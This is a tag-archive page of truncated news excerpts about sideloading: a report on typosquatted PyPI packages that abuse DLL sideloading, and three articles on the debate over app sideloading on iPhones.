Tag Archive for: sideloading

New Malicious PyPI Packages Uses DLL Sideloading

/in


Researchers have discovered that threat actors have been using open-source platforms and codes for several purposes, such as hosting C2 infrastructure, storing stolen data, and delivering second and third-stage downloaders or rootkit programs.

Two open-source PyPI packages were discovered to be utilized by threat actors for executing code via DLL sideloading attacks as a means of evading security monitoring tools.

The packages were identified as NP6HelperHttptest and NP6HelperHttper. 

Malicious PyPI Packages

According to the reports shared with Cyber Security News, open-source ecosystems are most widely used by almost every developer, which does not have a reputation provider to assess the quality and reliability of the code.

Thus making it extremely simple and easier for threat actors to insert malicious codes into the repositories and perform supply chain attacks.

In addition to this, researchers discovered two attack types that are used in software supply chain attacks, namely typosquatting and repojacking.

The two malicious PyPI packages were involved in the Typosquatting attacks as the package names are identical to one of the legitimate NP6 packages.

Malware infection stages (Source: Reversing Labs)

Developers mostly ignore the spelling and consider the packages legitimate, proceeding to use them in development.

Once this is done, threat actors can pivot their ways into the organizations and perform malicious activities.

Malicious Script Abusing DLL Sideloading

Both of the malicious PyPI packages consisted of a setup.py script that extends the setup tools command for downloading two other files: Comserver.exe and dgdeskband64.dll.

Comserver.exe is a legitimate file signed with a valid certificate from Beijing-based Kingsoft Corp, while dgdeskband64.dll is a malicious file that downloads further and runs a second-stage payload.

Setup.py file (Source: Reversing Labs)

The Comserver.exe has the purpose of loading a library, dgdeskband64.dll, for invoking its exported function Dllinstall.

However, the dgdeskband64.dll malicious file inside the package is not the legitimate one expected from comserver.exe. 

Different exports for the legit and malicious dll (Source:…

Source…

What it means for your iPhone if Apple permits sideloading

/in


On Thursday, the Senate Judiciary Committee held a session to amend and then vote on the Open App Markets Act, a bipartisan bill designed to rein in the monopoly power of smartphone app stores—mainly those run by Apple and Google. Notably, the bill would require those companies to allow users of Android and iOS devices to download apps from places other than the Google Play store and Apple App Store, a practice called sideloading.

As you might imagine, Apple and Google and the lobby groups that represent them are trying hard (and spending big) to derail the antitrust bill. The bill may be particularly galling to Apple, which likes to keep tight control of the software on its devices, citing concerns over app security and user privacy. Google, by contrast, already allows users to install apps outside of its Play store.

The Judiciary Committee voted to send the bill on to the full Senate, where leadership will now decide whether to initiate debate. The bill has solid bipartisan support and has a real chance of passage. So it’s worth asking what Apple would do if it were required to allow apps on the iPhone from other app stores or marketplaces. What new security features could Apple introduce in iOS to prevent malicious apps from making it onto iPhones?

I asked some Apple pundits and security experts after the hearing Thursday.

Apple could—and should—bring their MacOS Gatekeeper security layer to iOS.”

AltStore developer Riley Testut

“I guess they’d rely on sandboxing to isolate [malicious] apps,” says Charlie Miller, a veteran mobile security engineer who currently works for the autonomous car company Cruise. Sandboxing is a way of isolating a piece of software to prevent it from interacting with other apps or interfering with the operating system—a technique that can minimize the chances of an app doing intentional or unintentional harm.

But sandboxing is possible only after an app is already on the device. “You can install what you want, but iOS can ‘try to’ limit what it can do, i.e., it can’t read your Netflix password,” Miller said in a message. (Miller is coauthor with Dino Dai Zovi of The Mac Hacker’s Handbook.)

If the law passes, the experience of…

Source…

Facebook tests App Store rules, Apple fights sideloading, Netflix games go global – TechCrunch

/in


Welcome back to This Week in Apps, the weekly TechCrunch series that recaps the latest in mobile OS news, mobile applications and the overall app economy.

The app industry continues to grow, with a record 218 billion downloads and $143 billion in global consumer spend in 2020. Consumers last year also spent 3.5 trillion minutes using apps on Android devices alone. And in the U.S., app usage surged ahead of the time spent watching live TV. Currently, the average American watches 3.7 hours of live TV per day, but now spends four hours per day on their mobile devices.

Apps aren’t just a way to pass idle hours — they’re also a big business. In 2019, mobile-first companies had a combined $544 billion valuation, 6.5x higher than those without a mobile focus. In 2020, investors poured $73 billion in capital into mobile companies — a figure that’s up 27% year-over-year.

This Week in Apps offers a way to keep up with this fast-moving industry in one place with the latest from the world of apps, including news, updates, startup fundings, mergers and acquisitions, and suggestions about new apps and games to try, too.

Do you want This Week in Apps in your inbox every Saturday? Sign up here: techcrunch.com/newsletters

Google Play to allow support for alternative billing systems in South Korea

Following the passage of the so-called “anti-Google law” in South Korea, Google says it will comply with the new mandate by giving Android app developers on Google Play the ability to offer alternative payment systems alongside Google’s own. The legislation represents the first time a government has been able to force app stores to open up to third-party payment systems for in-app purchases — a change that could impact both app stores’ revenues, as developers look to skirt the tech giants’ commissions.

Image Credits: Google

In a blog post this week, Google says developers in South Korea will be able to add an alternative in-app billing system in addition to Google Play’s billing system for their mobile and tablet users in the country. At checkout, users will be able to choose which billing system they want to use for their purchase. Details for developers about how to…

Source…

Apple Makes Case Against App Sideloading by Comparing iPhone Security to Android Malware Stats

/in


Of the two major mobile operating system vendors, Apple enjoys a reputation for being the more private and safe option. The company attributes iPhone security to its “walled garden” approach, restricting app sideloading and making the App Store the only simple and straightforward way to get software onto its devices.

In the face of court decisions that may ultimately force it to loosen this policy, Apple is engaging in a PR campaign that has commissioned research to connect the more open architecture of Android to increased risk of malware. Among other claims, Apple says that an Android device is up to 47 times more likely to contract malware and that allowing app sideloading would attract a wave of cyber crime to the iOS platform.

Apple touts iPhone security ahead of regulatory decisions

Apple’s latest research-driven pamphlet touts the “critical importance” of iPhone security, making the case that a smartphone tends to be the type of device that contains the greatest amount of sensitive personal information. The central theme is that app sideloading would cripple its carefully-structured security protections and expose users to attacks.

The statistics it presents certainly cast Android in a poor light. Apple claims that its rival mobile OS experiences 15 to 47 times more malware infections, totalling six million attacks per month and about 230,000 new malware infections per day.

Apple also claims that allowing app sideloading would be detrimental to its users in a number of ways. Cupertino predicts a wave of cyber crime coming to its ecosystem, even if app sideloading was restricted to approved third-party app stores, along with reduced control over apps for users and the removal of “core components of iPhone security” from iOS due to requirements created by certain sideloading initiatives. Apple also predicts users being tricked by fake third-party app stores and forced into sideloading of apps by employers and schools.

While it is in Apple’s financial interest to paint as dire a picture as possible, the company is not factually wrong on some of its core assertions. However, it also may be exaggerating the case. As the Pegasus spyware…

Source…